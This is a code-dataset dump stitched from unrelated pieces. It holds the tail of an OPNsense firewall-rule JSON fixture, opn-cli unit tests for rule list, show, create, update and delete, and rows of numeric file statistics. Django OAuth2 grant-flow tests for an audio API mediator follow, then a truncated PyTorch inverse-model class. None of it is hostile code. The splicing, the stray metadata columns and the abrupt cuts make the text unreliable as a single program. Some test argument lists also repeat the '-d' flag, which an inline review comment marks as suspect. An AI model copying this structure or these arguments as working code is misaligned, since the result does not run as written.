},
"ENCAP": {
"value": "ENCAP",
"selected": 0
},
"GMTP": {
"value": "GMTP",
"selected": 0
},
"IFMP": {
"value": "IFMP",
"selected": 0
},
"PNNI": {
"value": "PNNI",
"selected": 0
},
"PIM": {
"value": "PIM",
"selected": 0
},
"ARIS": {
"value": "ARIS",
"selected": 0
},
"SCPS": {
"value": "SCPS",
"selected": 0
},
"QNX": {
"value": "QNX",
"selected": 0
},
"A/N": {
"value": "A/N",
"selected": 0
},
"IPCOMP": {
"value": "IPCOMP",
"selected": 0
},
"SNP": {
"value": "SNP",
"selected": 0
},
"COMPAQ-PEER": {
"value": "COMPAQ-PEER",
"selected": 0
},
"IPX-IN-IP": {
"value": "IPX-IN-IP",
"selected": 0
},
"CARP": {
"value": "CARP",
"selected": 0
},
"PGM": {
"value": "PGM",
"selected": 0
},
"L2TP": {
"value": "L2TP",
"selected": 0
},
"DDX": {
"value": "DDX",
"selected": 0
},
"IATP": {
"value": "IATP",
"selected": 0
},
"STP": {
"value": "STP",
"selected": 0
},
"SRP": {
"value": "SRP",
"selected": 0
},
"UTI": {
"value": "UTI",
"selected": 0
},
"SMP": {
"value": "SMP",
"selected": 0
},
"SM": {
"value": "SM",
"selected": 0
},
"PTP": {
"value": "PTP",
"selected": 0
},
"ISIS": {
"value": "ISIS",
"selected": 0
},
"CRTP": {
"value": "CRTP",
"selected": 0
},
"CRUDP": {
"value": "CRUDP",
"selected": 0
},
"SPS": {
"value": "SPS",
"selected": 0
},
"PIPE": {
"value": "PIPE",
"selected": 0
},
"SCTP": {
"value": "SCTP",
"selected": 0
},
"FC": {
"value": "FC",
"selected": 0
},
"RSVP-E2E-IGNORE": {
"value": "RSVP-E2E-IGNORE",
"selected": 0
},
"UDPLITE": {
"value": "UDPLITE",
"selected": 0
},
"MPLS-IN-IP": {
"value": "MPLS-IN-IP",
"selected": 0
},
"MANET": {
"value": "MANET",
"selected": 0
},
"HIP": {
"value": "HIP",
"selected": 0
},
"SHIM6": {
"value": "SHIM6",
"selected": 0
},
"WESP": {
"value": "WESP",
"selected": 0
},
"ROHC": {
"value": "ROHC",
"selected": 0
},
"PFSYNC": {
"value": "PFSYNC",
"selected": 0
},
"DIVERT": {
"value": "DIVERT",
"selected": 0
}
},
"source_net": "192.168.1.0/24",
"source_not": "0",
"source_port": "",
"destination_net": "10.0.0.0/24",
"destination_not": "0",
"destination_port": "ftp",
"gateway": {
"": {
"value": "none",
"selected": True
},
"Null4": {
"value": "Null4 - 127.0.0.1",
"selected": 0
},
"Null6": {
"value": "Null6 - ::1",
"selected": 0
},
"WAN_DHCP": {
"value": "WAN_DHCP - 10.0.2.2",
"selected": 0
},
"WAN_DHCP6": {
"value": "WAN_DHCP6 - inet6",
"selected": 0
}
},
"log": "0",
"description": "Pass rule"
}
}
},
"snatrules": {
"rule": []
}
}
}
self._api_client_args_fixtures = [
'api_key',
'api_secret',
'https://127.0.0.1/api',
True,
'~/.opn-cli/ca.pem',
60
]
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_list(self, api_response_mock: Mock):
    """List rules in plain output and verify the selected columns line up."""
    column_spec = ','.join([
        'sequence', 'interface', 'action', 'direction', 'ipprotocol',
        'protocol', 'source_net', 'source_port', 'destination_net',
        'destination_port',
    ])
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [self._api_data_fixtures_list],
        rule,
        ['list', '-c', column_spec, '-o', 'plain'],
    )
    expected_rows = (
        "1 lan pass in inet TCP 10.0.0.0/24 80 192.168.0.0/24 http\n"
        "5 lan pass in inet TCP my_alias my_alias http\n"
        "10 lan pass in inet TCP 192.168.1.0/24 10.0.0.0/24 ftp\n"
    )
    self.assertIn(expected_rows, cli_result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_show_NOT_FOUND(self, api_response_mock: Mock):
    """Showing an unknown uuid yields empty output rather than an error."""
    unknown_uuid = 'b468c719-89db-45a8-bd02-b081246dc002'
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [[]],
        rule,
        ['show', unknown_uuid],
    )
    self.assertIn("", cli_result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_show_EMPTY_STRING(self, api_response_mock: Mock):
    """Showing with an empty uuid argument produces empty output."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [],
        rule,
        ['show', ''],
    )
    self.assertIn("", cli_result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_show(self, api_response_mock: Mock):
    """Show a single rule by uuid and verify its yaml rendering."""
    uuid = 'b468c719-89db-45a8-bd02-b081246dc002'
    rule_fixture = self._api_data_fixtures_list['filter']['rules']['rule'][uuid]
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [{"rule": rule_fixture}],
        rule,
        ['show', uuid, '-o', 'yaml'],
    )
    expected_yaml = (
        "sequence: '1'\n"
        "action: pass\n"
        "quick: '1'\n"
        "interface: lan\n"
        "direction: in\n"
        "ipprotocol: inet\n"
        "protocol: TCP\n"
        "source_net: 10.0.0.0/24\n"
        "source_not: '0'\n"
        "source_port: '80'\n"
        "destination_net: 192.168.0.0/24\n"
        "destination_not: '0'\n"
        "destination_port: http\n"
        "gateway: ''\n"
        "log: '0'\n"
        "description: test Rule astuerz\n"
        "enabled: '1'\n\n"
    )
    self.assertIn(expected_yaml, cli_result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_create_OK(self, api_response_mock: Mock):
    """Creating a rule with every option set walks the full savepoint ->
    create -> apply -> cancel-rollback transaction and reports success."""
    result = self._opn_cli_command_result(
        api_response_mock,
        [
            # One canned API response per request, consumed in call order.
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_create_OK,
            self._api_data_fixtures_apply_OK,
            self._api_data_fixtures_cancel_rollback_OK,
        ],
        rule,
        [
            "create", "20",
            "-a", "block",
            "--no-quick",
            "-i", "lan,wan",
            "-d", "in",
            "-ip", "inet",
            "-p", "TCP",
            "-src", "20.82.65.183",
            "--no-source-invert",
            "-src-port", "8081",
            "-dst", "192.168.1.1",
            "--no-destination-invert",
            "-dst-port", "https",
            "--gateway", "Null4",
            "--log",
            # NOTE(review): "-d" is passed twice in this arg list (direction
            # "in" above and this description) -- looks like the description
            # should use a distinct flag; confirm against the CLI's option
            # definitions before changing.
            "-d", "example block rule",
            "--disabled",
        ]
    )
    self.assertIn(
        (
            "saved \n"
        ),
        result.output
    )
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_create_ERROR(self, api_response_mock: Mock):
    """A validation failure from the create endpoint aborts with exit code 1."""
    cli_args = [
        "create", "40",
        "-a", "pass",
        "-i", "lan",
        "-src", "alias_not_exists",
        "-dst", "192.168.1.1",
        "-d", "example fails",
    ]
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_create_ERROR,
            self._api_data_fixtures_apply_OK,
            self._api_data_fixtures_cancel_rollback_OK,
        ],
        rule,
        cli_args,
    )
    expected_error = (
        "Error: {'result': 'failed', "
        "'validations': {'rule.source_net': 'alias_not_exists is not a valid source IP address or alias.'}}\n"
    )
    self.assertIn(expected_error, cli_result.output)
    self.assertEqual(1, cli_result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_update_OK(self, api_response_mock: Mock):
    """Updating an existing rule with every option set walks the savepoint ->
    update -> apply -> cancel-rollback transaction and reports success."""
    result = self._opn_cli_command_result(
        api_response_mock,
        [
            # One canned API response per request, consumed in call order.
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_update_OK,
            self._api_data_fixtures_apply_OK,
            self._api_data_fixtures_cancel_rollback_OK,
        ],
        rule,
        [
            "update", "85282721-934c-42be-ba4d-a93cbfda26af",
            "-s", "7",
            "-a", "pass",
            "--quick",
            "-i", "lan",
            "-d", "out",
            "-ip", "inet",
            "-p", "TCP",
            "-src", "example_alias",
            "--source-invert",
            "-src-port", "",
            "-dst", "20.82.65.183",
            "--destination-invert",
            "-dst-port", "ssh",
            "--gateway", "",
            "--no-log",
            # NOTE(review): "-d" is passed twice here (direction "out" above
            # and this description); confirm the description flag against the
            # CLI's option definitions before changing.
            "-d", "example pass rule",
            "--enabled",
        ]
    )
    self.assertIn(
        (
            "saved \n"
        ),
        result.output
    )
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_update_NOT_EXISTS(self, api_response_mock: Mock):
    """Updating an unknown uuid surfaces the API failure and exits non-zero."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_update_NOT_EXISTS,
        ],
        rule,
        ["update", "85282721-934c-42be-ba4d-a93cbfda26af", "--disabled"],
    )
    self.assertIn("Error: {'result': 'failed'}\n", cli_result.output)
    self.assertEqual(1, cli_result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_delete_OK(self, api_response_mock: Mock):
    """Deleting an existing rule runs the full transaction and prints 'deleted'."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_delete_OK,
            self._api_data_fixtures_apply_OK,
            self._api_data_fixtures_cancel_rollback_OK,
        ],
        rule,
        ["delete", "85282721-934c-42be-ba4d-a93cbfda26af"],
    )
    self.assertIn("deleted \n", cli_result.output)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_delete_NOT_FOUND(self, api_response_mock: Mock):
    """Deleting a missing rule reports 'not found' and exits non-zero."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_delete_NOT_FOUND,
        ],
        rule,
        ["delete", "not_existing_rule"],
    )
    self.assertIn("Error: {'result': 'not found'}\n", cli_result.output)
    self.assertEqual(1, cli_result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_start_transaction_FAILED(self, api_response_mock: Mock):
    """A failed savepoint aborts the command before any change is attempted."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [self._api_data_fixtures_savepoint_FAILED],
        rule,
        ["delete", "85282721-934c-42be-ba4d-a93cbfda26af"],
        True,
    )
    self.assertIn("Error: Savepoint creation failed: {'status': 'failed'}\n", cli_result.output)
    self.assertEqual(1, cli_result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_commit_transaction_apply_FAILED(self, api_response_mock: Mock):
    """A failed apply step is reported as an error with exit code 1."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_delete_OK,
            self._api_data_fixtures_apply_FAILED,
        ],
        rule,
        ["delete", "85282721-934c-42be-ba4d-a93cbfda26af"],
        True,
    )
    self.assertIn("Error: firewall rule apply failed: {'status': 'FAILED\\n\\n'}\n", cli_result.output)
    self.assertEqual(1, cli_result.exit_code)
@patch('opnsense_cli.commands.plugin.firewall.rule.ApiClient.execute')
def test_commit_transaction_cancel_rollback_FAILED(self, api_response_mock: Mock):
    """A failed rollback-cancel warns that the config reverts after 60s."""
    cli_result = self._opn_cli_command_result(
        api_response_mock,
        [
            self._api_data_fixtures_savepoint_OK,
            self._api_data_fixtures_delete_OK,
            self._api_data_fixtures_apply_OK,
            self._api_data_fixtures_cancel_rollback_FAILED,
        ],
        rule,
        ["delete", "85282721-934c-42be-ba4d-a93cbfda26af"],
        True,
    )
    expected_error = (
        "Error: firewall rule cancel rollback failed. "
        "Rollback configuration after 60 seconds: {'status': 'failed\\n\\n'}\n"
    )
    self.assertIn(expected_error, cli_result.output)
    self.assertEqual(1, cli_result.exit_code)
| 43.110112
| 119
| 0.178795
| 3,794
| 95,920
| 4.403532
| 0.08408
| 0.227869
| 0.028311
| 0.048902
| 0.915006
| 0.902376
| 0.884719
| 0.858742
| 0.853534
| 0.848866
| 0
| 0.040326
| 0.731391
| 95,920
| 2,224
| 120
| 43.129496
| 0.608112
| 0
| 0
| 0.683971
| 0
| 0.001366
| 0.144256
| 0.014408
| 0
| 0
| 0
| 0
| 0.008652
| 1
| 0.006375
| false
| 0.006375
| 0.001366
| 0
| 0.008197
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
35cca9fb7eafb1a9ef2343d233045c57da8e2297
| 18,433
|
py
|
Python
|
api/tests.py
|
Xavier-Cliquennois/ac-mediator
|
ce55b65ab7f4532fc11fbb2f994518c60240bfdc
|
[
"Apache-2.0"
] | 9
|
2016-11-17T08:04:01.000Z
|
2020-09-10T05:58:36.000Z
|
api/tests.py
|
Xavier-Cliquennois/ac-mediator
|
ce55b65ab7f4532fc11fbb2f994518c60240bfdc
|
[
"Apache-2.0"
] | 23
|
2016-10-26T14:43:55.000Z
|
2021-06-10T20:02:38.000Z
|
api/tests.py
|
Xavier-Cliquennois/ac-mediator
|
ce55b65ab7f4532fc11fbb2f994518c60240bfdc
|
[
"Apache-2.0"
] | 3
|
2018-03-03T12:07:28.000Z
|
2020-08-02T12:54:31.000Z
|
from django.test import TestCase, override_settings
from api.models import ApiClient
from accounts.models import Account
from django.core.urlresolvers import reverse
from services import management
from django.conf import settings
import oauth2_provider
import datetime
class OAuth2TestCase(TestCase):
def setUp(self):
    """Create a developer, an end user and three API clients covering the
    grant types exercised by the tests below."""
    self.dev_user = Account.objects.create_user('dev', password='devpass')
    self.end_user_password = 'endpass'
    self.end_user = Account.objects.create_user('end', password=self.end_user_password)
    # (name, client_type, grant_type, redirect_uris) for each test client.
    # All start with password_grant_is_allowed=False; individual tests
    # flip that flag when they need it.
    client_specs = [
        ('PublicImplicitClient',
         ApiClient.CLIENT_PUBLIC, ApiClient.GRANT_IMPLICIT, 'http://example.com'),
        ('PublicPasswordClient',
         ApiClient.CLIENT_PUBLIC, ApiClient.GRANT_PASSWORD, ''),
        ('ConfidentialAuthorizationCodeClient',
         ApiClient.CLIENT_CONFIDENTIAL, ApiClient.GRANT_AUTHORIZATION_CODE, 'http://example.com'),
    ]
    for name, client_type, grant_type, redirect_uris in client_specs:
        ApiClient.objects.create(
            name=name,
            user=self.dev_user,
            agree_tos=True,
            client_type=client_type,
            authorization_grant_type=grant_type,
            redirect_uris=redirect_uris,
            password_grant_is_allowed=False,
        )
@staticmethod
def get_params_from_url(url):
params_part = url.split('?')[1]
return {item.split('=')[0]: item.split('=')[1] for item in params_part.split('&')}
@staticmethod
def fragment_params_from_url(url):
params_part = url.split('#')[1]
return {item.split('=')[0]: item.split('=')[1] for item in params_part.split('&')}
def check_dict_has_fields(self, dictionary, fields):
    """Assert that every name in *fields* is present as a key of *dictionary*."""
    for expected_field in fields:
        self.assertIn(expected_field, dictionary)
def check_access_token_response_fields(self, resp):
    """Assert *resp* carries a full token payload (including refresh_token)."""
    required_fields = ['expires_in', 'scope', 'refresh_token', 'access_token', 'token_type']
    self.check_dict_has_fields(resp.json(), required_fields)
def check_redirect_uri_access_token_frag_params(self, params):
    """Assert redirect-fragment *params* carry a token payload (no refresh_token)."""
    required_fields = ['expires_in', 'scope', 'access_token', 'token_type']
    self.check_dict_has_fields(params, required_fields)
def test_password_grant_flow(self):
    """Exercise the OAuth2 resource-owner-password grant end to end:
    client eligibility (grant type + password_grant_is_allowed flag),
    every invalid-request error case, and finally a trailing-slash URL.
    """
    # Return 'unauthorized_client' when trying password grant with a client of other authorization_grant_type
    client = ApiClient.objects.get(name='PublicImplicitClient')
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': client.client_id,
            'grant_type': 'password',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 401)
    self.assertEqual(resp.json()['error'], 'unauthorized_client')
    # Return 'unauthorized_client' when trying password grant with a client with authorization_grant_type
    # set to 'password' but with 'password_grant_is_allowed' set to False
    client = ApiClient.objects.get(name='PublicPasswordClient')
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': client.client_id,
            'grant_type': 'password',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 401)
    self.assertEqual(resp.json()['error'], 'unauthorized_client')
    # Return 200 OK when trying password grant with a client with authorization_grant_type
    # set to 'password' and with 'password_grant_is_allowed' set to True
    client.password_grant_is_allowed = True
    client.save()
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': client.client_id,
            'grant_type': 'password',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 200)
    self.check_access_token_response_fields(resp)
    # Return 'invalid_client' when missing client_id
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            # 'client_id' deliberately omitted for this case:
            #'client_id': client.client_id,
            'grant_type': 'password',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 401)
    self.assertEqual(resp.json()['error'], 'invalid_client')
    # Return 'invalid_client' when client_id does not exist in db
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': 'thi5i5aninv3nt3dcli3ntid',
            'grant_type': 'password',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 401)
    self.assertEqual(resp.json()['error'], 'invalid_client')
    # Return 'unsupported_grant_type' when grant type does not exist
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': client.client_id,
            'grant_type': 'invented_grant',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(resp.json()['error'], 'unsupported_grant_type')
    # Return 'invalid_request' when no username is provided
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': client.client_id,
            'grant_type': 'password',
            # 'username' deliberately omitted for this case:
            #'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(resp.json()['error'], 'invalid_request')
    # Return 'invalid_request' when no password is provided
    resp = self.client.post(
        reverse('oauth2_provider:token'),
        {
            'client_id': client.client_id,
            'grant_type': 'password',
            'username': self.end_user.username,
            # 'password' deliberately omitted for this case:
            #'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 400)
    self.assertEqual(resp.json()['error'], 'invalid_request')
    # Test get token with trailing slash (https://github.com/AudioCommons/ac-mediator/issues/19)
    # NOTE: since change in b11a0197bbecbbdb6e5f3c82285f6b749596947d reverse() will return URLs
    # without trailing slashes, therefore here we complement the test by adding the slash
    resp = self.client.post(
        reverse('oauth2_provider:token') + '/',
        {
            'client_id': client.client_id,
            'grant_type': 'password',
            'username': self.end_user.username,
            'password': self.end_user_password,
        })
    self.assertEqual(resp.status_code, 200)
def test_implicit_grant_flow(self):
    """Exercise the OAuth2 implicit grant: anonymous redirect to login,
    error redirects for bad response types, bad client_id handling, the
    authorize form, and the final fragment-encoded token redirect.
    """
    # Redirect to login page when visiting authorize page with an AnonymousUser
    client = ApiClient.objects.get(name='PublicImplicitClient')
    resp = self.client.get(
        reverse('oauth2_provider:authorize'),
        {
            'client_id': client.client_id,
            'response_type': 'token',
        })
    self.assertIn('/login/', resp.url)
    # Redirect includes 'error' param when using non existing response type
    self.client.login(username=self.end_user.username, password=self.end_user_password)
    resp = self.client.get(
        reverse('oauth2_provider:authorize'),
        {
            'client_id': client.client_id,
            'response_type': 'non_existing_response_type',
        })
    # NOTE(review): assertEquals is a deprecated alias of assertEqual.
    self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
    resp_params = self.get_params_from_url(resp.url)
    self.check_dict_has_fields(resp_params, ['error'])
    self.assertEqual(resp_params['error'], 'unsupported_response_type')
    # Redirect includes 'error' param when using non supported response type
    resp = self.client.get(
        reverse('oauth2_provider:authorize'),
        {
            'client_id': client.client_id,
            'response_type': 'code',
        })
    self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
    resp_params = self.get_params_from_url(resp.url)
    self.check_dict_has_fields(resp_params, ['error'])
    self.assertEqual(resp_params['error'], 'unauthorized_client')
    # Authorization page is displayed with errors with non existing client_id
    resp = self.client.get(
        reverse('oauth2_provider:authorize'),
        {
            'client_id': 'thi5i5aninv3nt3dcli3ntid',
            'response_type': 'code',
        })
    self.assertEqual(resp.status_code, 400)
    self.assertIn('Invalid client_id parameter value', str(resp.content))
    # Authorization page is displayed correctly when correct response_type and client_id
    resp = self.client.get(
        reverse('oauth2_provider:authorize'),
        {
            'client_id': client.client_id,
            'response_type': 'token',
        })
    self.assertEqual(resp.status_code, 200)
    self.assertIn('name="allow" value="Authorize"', str(resp.content))
    # Final redirect includes token params
    resp = self.client.post(
        reverse('oauth2_provider:authorize'),
        {
            'client_id': client.client_id,
            'response_type': 'token',
            'redirect_uri': client.default_redirect_uri,
            'scope': 'read',
            'state': 'an_optional_state',
            'allow': 'Authorize',
        })
    self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
    resp_fragment_params = self.fragment_params_from_url(resp.url)
    self.assertEquals(resp_fragment_params['state'], 'an_optional_state')  # Check state is returned and preserved
    self.assertEquals('refresh_token' in resp_fragment_params, False)  # Check that refresh token is not returned
    self.check_redirect_uri_access_token_frag_params(resp_fragment_params)  # Check other params
def test_authorization_code_grant_flow(self):
# Redirect to login page when visiting authorize page with an AnonymousUser
client = ApiClient.objects.get(name='ConfidentialAuthorizationCodeClient')
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
})
self.assertIn('/login/', resp.url)
# Redirect includes 'error' param when using non existing response type
self.client.login(username=self.end_user.username, password=self.end_user_password)
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'non_existing_response_type',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.check_dict_has_fields(resp_params, ['error'])
self.assertEqual(resp_params['error'], 'unsupported_response_type')
# Redirect includes 'error' param when using non supported response type
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'token',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.check_dict_has_fields(resp_params, ['error'])
self.assertEqual(resp_params['error'], 'unauthorized_client')
# Authorization page is displayed with errors with non existing client_id
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': 'thi5i5aninv3nt3dcli3ntid',
'response_type': 'code',
})
self.assertEqual(resp.status_code, 400)
self.assertIn('Invalid client_id parameter value', str(resp.content))
# Authorization page is displayed correctly when correct response_type and client_id
resp = self.client.get(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
})
self.assertEqual(resp.status_code, 200)
self.assertIn('name="allow" value="Authorize"', str(resp.content))
# Redirect includes 'code' and 'state' params
resp = self.client.post(
reverse('oauth2_provider:authorize'),
{
'client_id': client.client_id,
'response_type': 'code',
'redirect_uri': client.default_redirect_uri,
'scope': 'read',
'state': 'an_optional_state',
'allow': 'Authorize',
})
self.assertEquals(resp.url.startswith(client.default_redirect_uri), True)
resp_params = self.get_params_from_url(resp.url)
self.assertEquals(resp_params['state'], 'an_optional_state') # Check state is returned and preserved
self.check_dict_has_fields(resp_params, ['code']) # Check code is there
# Return 200 OK 'access_denied' when requesting access token setting client_id and client_secret in body params
code = resp_params['code']
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
'client_secret': client.client_secret,
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': client.default_redirect_uri
})
self.assertEqual(resp.status_code, 200)
self.check_access_token_response_fields(resp)
# Return 'invalid_client' when trying to get access without client_secret
code = resp_params['code']
resp = self.client.post(
reverse('oauth2_provider:token'),
{
'client_id': client.client_id,
#'client_secret': client.client_secret,
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': client.default_redirect_uri
})
self.assertEqual(resp.status_code, 401)
self.assertEqual(resp.json()['error'], 'invalid_client')
# Copy the dict before modifying it: the original code mutated
# settings.REST_FRAMEWORK in place, leaking the IsAuthenticated override
# into every other test that runs in the same process.
modified_rest_framework_settings = dict(settings.REST_FRAMEWORK)
modified_rest_framework_settings['DEFAULT_PERMISSION_CLASSES'] = ['rest_framework.permissions.IsAuthenticated']


@override_settings(REST_FRAMEWORK=modified_rest_framework_settings)
class DownloadEndpointsTestCase(TestCase):
    """Tests for the 'api-download' endpoint: auth and parameter validation."""

    def setUp(self):
        # Users: a developer who owns the API client and an end user.
        self.dev_user = Account.objects.create_user('dev', password='devpass')
        self.end_user_password = 'endpass'
        self.end_user = Account.objects.create_user('end', password=self.end_user_password)
        # Public password-grant client used to mint access tokens below.
        ApiClient.objects.create(
            name='TestClient',
            user=self.dev_user,
            agree_tos=True,
            client_type=ApiClient.CLIENT_PUBLIC,
            authorization_grant_type=ApiClient.GRANT_PASSWORD,
            redirect_uris='http://example.com',
            password_grant_is_allowed=True,
        )
        # Register a fake download service so no real backend is contacted.
        from services.acservice.base import BaseACService
        from services.acservice.download import ACDownloadMixin

        class FakeService(BaseACService, ACDownloadMixin):
            NAME = 'DownloadService'

            def get_download_url(self, acid):
                # Deterministic URL derived from the requested acid.
                return 'http://test.url/for/test/{0}'.format(acid)

        self.service = FakeService()
        self.service.configure({'service_id': 'downloadserviceid', 'enabled': 'yes'})
        management.available_services = [self.service]

    def test_get_download_link(self):
        # Unauthenticated request is rejected (IsAuthenticated is the default).
        resp = self.client.get(reverse('api-download'), {
            'acid': 'DownloadService:123',
        })
        self.assertEqual(resp.status_code, 401)
        # Create an access token for application and user.
        client = ApiClient.objects.get(name='TestClient')
        access_token = self.access_token = oauth2_provider.models.AccessToken.objects.create(
            token='a_fake_token',
            application=client,
            user=self.end_user,
            expires=datetime.datetime.today() + datetime.timedelta(hours=1)
        )
        # Authenticated request succeeds.
        resp = self.client.get(reverse('api-download'), {
            'acid': 'DownloadService:123',
        }, HTTP_AUTHORIZATION='Bearer {0}'.format(access_token))
        self.assertEqual(resp.status_code, 200)
        # Unknown service name in the acid -> 404.
        resp = self.client.get(reverse('api-download'), {
            'acid': 'DownloadService2:123',
        }, HTTP_AUTHORIZATION='Bearer {0}'.format(access_token))
        self.assertEqual(resp.status_code, 404)
        # Missing 'acid' parameter -> 400.
        resp = self.client.get(reverse('api-download'), {
            'acid2': 'DownloadService:123',
        }, HTTP_AUTHORIZATION='Bearer {0}'.format(access_token))
        self.assertEqual(resp.status_code, 400)
| 42.570439
| 119
| 0.618999
| 1,958
| 18,433
| 5.594995
| 0.117467
| 0.037974
| 0.053765
| 0.036513
| 0.771702
| 0.743496
| 0.737928
| 0.710361
| 0.701689
| 0.692104
| 0
| 0.01254
| 0.277546
| 18,433
| 432
| 120
| 42.668981
| 0.810092
| 0.142842
| 0
| 0.716374
| 0
| 0
| 0.176803
| 0.054914
| 0
| 0
| 0
| 0
| 0.137427
| 1
| 0.035088
| false
| 0.099415
| 0.02924
| 0.002924
| 0.081871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ea0ca27198361255426d3ae37e032a51153c9bb6
| 6,075
|
py
|
Python
|
behavior_cloning/learner.py
|
chickert/reinforcement_learning
|
473323f08b079004f27a7f0931e5e9a46bfad347
|
[
"MIT"
] | null | null | null |
behavior_cloning/learner.py
|
chickert/reinforcement_learning
|
473323f08b079004f27a7f0931e5e9a46bfad347
|
[
"MIT"
] | null | null | null |
behavior_cloning/learner.py
|
chickert/reinforcement_learning
|
473323f08b079004f27a7f0931e5e9a46bfad347
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as f
from mlp import MultiLayerPerceptron
import torch
import torch.nn as nn
import torch.optim as optim
import logging
import numpy as np
# Prefer GPU when available. NOTE(review): 'device' is not referenced by the
# visible code below — presumably used by callers; confirm before removing.
device = "cuda" if torch.cuda.is_available() else "cpu"
# Module-level logger used by the training loops; INFO with default handler.
logger = logging.getLogger(__name__)
logging.basicConfig()
logger.setLevel(logging.INFO)
class InverseModel(nn.Module):
    """
    Inverse model: predicts the action that transitions a start state to a
    desired next state. An MLP over the concatenation [start_state, next_state].
    """
    def __init__(self, start_state_dims, next_state_dims, action_dims,
                 latent_var_1=64, latent_var_2=32, criterion=None, lr=4e-4, seed=0):
        """
        Args:
            start_state_dims: dimensionality of the start state.
            next_state_dims: dimensionality of the desired next state.
            action_dims: dimensionality of the predicted action.
            latent_var_1, latent_var_2: hidden-layer widths.
            criterion: loss module; defaults to a fresh nn.MSELoss().
                (Was a mutable default `nn.MSELoss()` shared by all instances.)
            lr: Adam learning rate.
            seed: torch manual seed for reproducible weight initialization.
        """
        torch.manual_seed(seed)
        super(InverseModel, self).__init__()
        self.state_dims = start_state_dims + next_state_dims
        self.model = nn.Sequential(
            nn.Linear(self.state_dims, latent_var_1),
            nn.ReLU(),
            nn.Linear(latent_var_1, latent_var_2),
            nn.ReLU(),
            nn.Linear(latent_var_2, action_dims)
        )
        # Build the default loss per instance instead of sharing one object
        # across every InverseModel via the default-argument cell.
        self.criterion = criterion if criterion is not None else nn.MSELoss()
